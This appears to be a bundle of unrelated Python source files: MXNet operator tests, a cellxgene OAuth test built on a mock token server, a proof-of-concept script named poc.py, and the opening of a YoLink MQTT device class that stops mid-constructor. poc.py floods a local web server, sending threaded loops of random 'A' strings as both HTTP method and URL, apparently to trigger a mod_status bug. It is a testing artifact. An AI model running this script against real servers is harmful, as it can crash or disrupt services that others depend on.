assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
@with_seed()
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, alpha, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
hight = 1
assertRaises(MXNetError, mx.nd.random_uniform, alpha, beta, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@with_seed()
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
|
test_oauth.py
|
import unittest
import random
import time
import base64
import json
import requests
from flask import Flask, jsonify, make_response, request, redirect
from multiprocessing import Process
import jose
from server.common.app_config import AppConfig
from server.test import FIXTURES_ROOT, test_server
# This tests the oauth authentication type.
# This test starts a cellxgene server and a mock oauth server.
# API requests to login and logout and get the userinfo are made
# to the cellxgene server, which then sends requests to the mock
# oauth server.
# number of seconds that the oauth token is valid
TOKEN_EXPIRES = 5
# Create a mocked out oauth token, which servers all the endpoints needed by the oauth type.
mock_oauth_app = Flask("mock_oauth_app")
@mock_oauth_app.route("/authorize")
def authorize():
callback = request.args.get("redirect_uri")
state = request.args.get("state")
return redirect(callback + f"?code=fakecode&state={state}")
@mock_oauth_app.route("/oauth/token", methods=["POST"])
def token():
headers = dict(alg="RS256", kid="fake_kid")
payload = dict(name="fake_user", sub="fake_id", email="fake_user@email.com", email_verified=True)
jwt = jose.jwt.encode(claims=payload, key="mysecret", algorithm="HS256", headers=headers)
r = {
"access_token": f"access-{time.time()}",
"id_token": jwt,
"refresh_token": f"random-{time.time()}",
"scope": "openid profile email",
"expires_in": TOKEN_EXPIRES,
"token_type": "Bearer",
"expires_at": time.time() + TOKEN_EXPIRES,
}
return make_response(jsonify(r))
@mock_oauth_app.route("/v2/logout")
def logout():
return_to = request.args.get("returnTo")
return redirect(return_to)
@mock_oauth_app.route("/.well-known/jwks.json")
def jwks():
data = dict(alg="RS256", kty="RSA", use="sig", kid="fake_kid",)
return make_response(jsonify(dict(keys=[data])))
# The port that the mock oauth server will listen on
PORT = random.randint(10000, 12000)
# function to launch the mock oauth server
def launch_mock_oauth():
mock_oauth_app.run(port=PORT)
class AuthTest(unittest.TestCase):
def setUp(self):
self.dataset_dataroot = FIXTURES_ROOT
self.mock_oauth_process = Process(target=launch_mock_oauth)
self.mock_oauth_process.start()
def tearDown(self):
self.mock_oauth_process.terminate()
def auth_flow(self, app_config, cookie_key=None):
with test_server(app_config=app_config) as server:
session = requests.Session()
# auth datasets
config = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/config").json()
userinfo = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/userinfo").json()
self.assertFalse(userinfo["userinfo"]["is_authenticated"])
self.assertIsNone(userinfo["userinfo"]["username"])
self.assertTrue(config["config"]["authentication"]["requires_client_login"])
self.assertTrue(config["config"]["parameters"]["annotations"])
login_uri = config["config"]["authentication"]["login"]
logout_uri = config["config"]["authentication"]["logout"]
self.assertEqual(login_uri, "/login?dataset=d/pbmc3k.cxg/")
self.assertEqual(logout_uri, "/logout")
r = session.get(f"{server}/{login_uri}")
# check that the login redirect worked
self.assertEqual(r.history[0].status_code, 302)
self.assertEqual(r.url, f"{server}/d/pbmc3k.cxg/")
config = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/config").json()
userinfo = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/userinfo").json()
self.assertTrue(userinfo["userinfo"]["is_authenticated"])
self.assertEqual(userinfo["userinfo"]["username"], "fake_user")
self.assertTrue(config["config"]["parameters"]["annotations"])
if cookie_key:
cookie = session.cookies.get(cookie_key)
token = json.loads(base64.b64decode(cookie))
access_token_before = token.get("access_token")
expires_at_before = token.get("expires_at")
# let the token expire
time.sleep(TOKEN_EXPIRES + 1)
# check that refresh works
session.get(f"{server}/{login_uri}")
userinfo = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/userinfo").json()
self.assertTrue(userinfo["userinfo"]["is_authenticated"])
self.assertEqual(userinfo["userinfo"]["username"], "fake_user")
cookie = session.cookies.get(cookie_key)
token = json.loads(base64.b64decode(cookie))
access_token_after = token.get("access_token")
expires_at_after = token.get("expires_at")
self.assertNotEqual(access_token_before, access_token_after)
self.assertTrue(expires_at_after - expires_at_before > TOKEN_EXPIRES)
r = session.get(f"{server}/{logout_uri}")
# check that the logout redirect worked
self.assertEqual(r.history[0].status_code, 302)
self.assertEqual(r.url, f"{server}")
config = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/config").json()
userinfo = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/userinfo").json()
self.assertFalse(userinfo["userinfo"]["is_authenticated"])
self.assertIsNone(userinfo["userinfo"]["username"])
self.assertTrue(config["config"]["parameters"]["annotations"])
def test_auth_oauth_session(self):
# test with session cookies
app_config = AppConfig()
app_config.update_server_config(
authentication__type="oauth",
authentication__params_oauth__api_base_url=f"http://localhost:{PORT}",
authentication__params_oauth__client_id="mock_client_id",
authentication__params_oauth__client_secret="mock_client_secret",
authentication__params_oauth__session_cookie=True,
)
app_config.update_server_config(multi_dataset__dataroot=self.dataset_dataroot)
app_config.complete_config()
self.auth_flow(app_config)
def test_auth_oauth_cookie(self):
# test with specified cookie
app_config = AppConfig()
app_config.update_server_config(
authentication__type="oauth",
authentication__params_oauth__api_base_url=f"http://localhost:{PORT}",
authentication__params_oauth__client_id="mock_client_id",
authentication__params_oauth__client_secret="mock_client_secret",
authentication__params_oauth__session_cookie=False,
authentication__params_oauth__cookie=dict(key="test_cxguser", httponly=True, max_age=60),
)
app_config.update_server_config(multi_dataset__dataroot=self.dataset_dataroot)
app_config.complete_config()
self.auth_flow(app_config, "test_cxguser")
|
poc.py
|
#! /usr/bin/env python
import httplib
import sys
import threading
import subprocess
import random
def send_request(method, url):
try:
c = httplib.HTTPConnection('127.0.0.1', 80)
c.request(method,url);
if "foo" in url:
print c.getresponse().read()
c.close()
except Exception, e:
print e
pass
def mod_status_thread():
while True:
send_request("GET", "/")
def requests():
evil = ''.join('A' for i in range(random.randint(0, 1024)))
while True:
send_request(evil, evil)
threading.Thread(target=mod_status_thread).start()
threading.Thread(target=requests).start()
|
yolink_mqtt_class.py
|
import hashlib
import json
import os
import sys
import time
import threading
import logging
from datetime import datetime
from dateutil.tz import *
logging.basicConfig(level=logging.DEBUG)
import paho.mqtt.client as mqtt
#from logger import getLogger
#log = getLogger(__name__)
from queue import Queue
from yolink_devices import YoLinkDevice
#from yolink_mqtt_client import YoLinkMQTTClient
#from yolink_mqtt_device import YoLinkMQTTClient
"""
Object representation for YoLink MQTT Client
"""
class YoLinkMQTTDevice(YoLinkDevice):
def __init__(self, csName, csid, csseckey, yolink_URL, mqtt_URL, mqtt_port, serial_num, callback):
super().__init__( yolink_URL, csid, csseckey, serial_num)
self.callback = callback
self.uniqueID = serial_num[0:10]
self.uniqueID = str(csName+'_'+ self.uniqueID )
self.build_device_api_request_data()
self.enable_device_api()
self.csid = csid
self.csseckey = csseckey
self.topicReq = csName+'/'+ self.uniqueID +'/request'
self.topicResp = csName+'/'+ self.uniqueID +'/response'
self.topicReport = csName+'/'+ self.uniqueID +'/report'
self.topicReportAll = csName+'/report'
self.yolink_URL = yolink_URL
self.mqtt_url = mqtt_URL
self.daysOfWeek = ['sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat']
self.mqtt_port = int(mqtt_port)
self.targetId = self.get_id()
self.lastUpdate = 'lastTime'
self.lastMessage = 'lastMessage'
self.deviceOnline = 'online'
self.deviceData = 'data'
self.deviceInfo = 'state'
self.deviceSchedule = 'schedules'
self.deviceDelays = 'delays' #may not be needed
self.messageTime = 'time'
self.forceStop = False
self.dataAPI = {
'lastTime':str(int(time.time()*1000))
,'lastMessage':{}
,'Online':None
,'data':{ 'state':{} }
}
self.dataQueue = Queue()
self.eventQueue = Queue()
self.mutex = threading.Lock()
self.timezoneOffsetSec = self.timezoneOffsetSec()
self.client = mqtt.Client(self.uniqueID, clean_session=True, userdata=None, protocol=mqtt.MQTTv311, transport="tcp")
